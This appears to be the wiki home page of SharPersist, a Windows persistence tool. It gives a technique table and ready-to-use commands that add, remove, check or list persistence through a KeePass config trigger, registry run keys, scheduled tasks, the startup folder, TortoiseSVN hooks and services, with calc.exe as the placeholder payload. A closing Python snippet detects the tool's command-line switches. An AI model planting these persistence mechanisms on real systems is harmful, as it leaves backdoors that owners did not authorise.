Home
Welcome to the wiki home page for SharPersist! For detailed information on each technique, you can navigate to the appropriate technique on the right-hand side. This will include usage information and detailed information on how each persistence technique works.
Technique | Description | Technique Switch Name (-t) | Admin Privileges Required? | Touches Registry? | Adds/Modifies/Removes Files on Disk? |
---|---|---|---|---|---|
KeePass | Backdoored KeePass configuration file with malicious trigger | keepass | No | No | Yes |
New Scheduled Task | New scheduled task that runs specified command | schtask | No | No | Yes |
Registry | Registry modification | reg | No | Yes | No |
Startup Folder | LNK file in user startup folder | startupfolder | No | No | Yes |
Tortoise SVN Hook Script | Tortoise SVN hook script to execute command when user connects to SVN repo | tortoisesvn | No | Yes | No |
New Service | New service that runs specified application | service | Yes | Yes | No |
Scheduled Task Backdoor | Adds additional action to an existing scheduled task | schtaskbackdoor | Yes | No | Yes |
KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
Tortoise SVN
SharPersist -t tortoisesvn -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -m add
Windows Service
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
Scheduled Task
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
KeePass
SharPersist -t keepass -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m remove
Registry
SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove
SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove -o env
SharPersist -t reg -k "logonscript" -m remove
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -n "Something Cool" -m remove
Startup Folder
SharPersist -t startupfolder -f "Some File" -m remove
Tortoise SVN
SharPersist -t tortoisesvn -m remove
Windows Service
SharPersist -t service -n "Some Service" -m remove
Scheduled Task
SharPersist -t schtask -n "Some Task" -m remove
KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m check
Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m check
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m check
Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m check
Tortoise SVN
SharPersist -t tortoisesvn -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -m check
Windows Service
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m check
Scheduled Task
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m check
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m check -o hourly
Registry
SharPersist -t reg -k "hkcurun" -m list
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -m list
SharPersist -t schtaskbackdoor -m list -n "Some Task"
SharPersist -t schtaskbackdoor -m list -o logon
Startup Folder
SharPersist -t startupfolder -m list
Windows Service
SharPersist -t service -m list
SharPersist -t service -m list -n "Some Service"
Scheduled Task
SharPersist -t schtask -m list
SharPersist -t schtask -m list -n "Some Task"
SharPersist -t schtask -m list -o logon
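For defenders, the switch grammar shown in the commands above is itself a detection surface. The following is an added example, not part of the SharPersist project: it classifies process-creation command lines by their `-t`/`-m` values, independent of the image name, and maps each hit to the table's admin, registry and disk columns for triage. The function names, record keys and sample events are constructed for illustration.

```python
import re

# -t switch -> (admin required, touches registry, touches disk), from the table above.
TECHNIQUES = {
    "keepass": (False, False, True),
    "schtask": (False, False, True),
    "reg": (False, True, False),
    "startupfolder": (False, False, True),
    "tortoisesvn": (False, True, False),
    "service": (True, True, False),
    "schtaskbackdoor": (True, False, True),
}
METHODS = {"add", "remove", "check", "list"}  # -m values used on this page
# One-letter switch followed by a quoted or bare value, e.g. -n "Some Task" or -m add.
SWITCH = re.compile(r'(?<!\S)-([tmcankvfo])\s+(?:"([^"]*)"|(\S+))')

def parse_switches(cmdline):
    """Return {switch letter: value} for every switch found in the command line."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in SWITCH.finditer(cmdline)}

def classify(cmdline):
    """Return a triage record if -t and -m match the documented grammar, else None."""
    sw = parse_switches(cmdline)
    tech, method = sw.get("t", "").lower(), sw.get("m", "").lower()
    if tech not in TECHNIQUES or method not in METHODS:
        return None
    admin, registry, disk = TECHNIQUES[tech]
    return {
        "technique": tech, "method": method,
        "changes_state": method in ("add", "remove"),  # these alter the entry
        "admin": admin, "check_registry": registry, "check_disk": disk,
        "command": sw.get("c"), "arguments": sw.get("a"),
        "name": sw.get("n") or sw.get("v") or sw.get("f"),
    }

# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'C:\Temp\tool.exe -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add',
    r'tool.exe -t service -m list -n "Some Service"',
    r'ping.exe -t 10.0.0.1',              # benign: -t value is not a technique
    r'tar.exe -c -f "backup.tar" docs',   # benign: no -t or -m pair
]

def triage(events):
    """Return triage records for the events that match, in input order."""
    return [hit for hit in map(classify, events) if hit]
```

Records with `check_registry` or `check_disk` set tell the analyst which artifact class to inspect on the host for that technique.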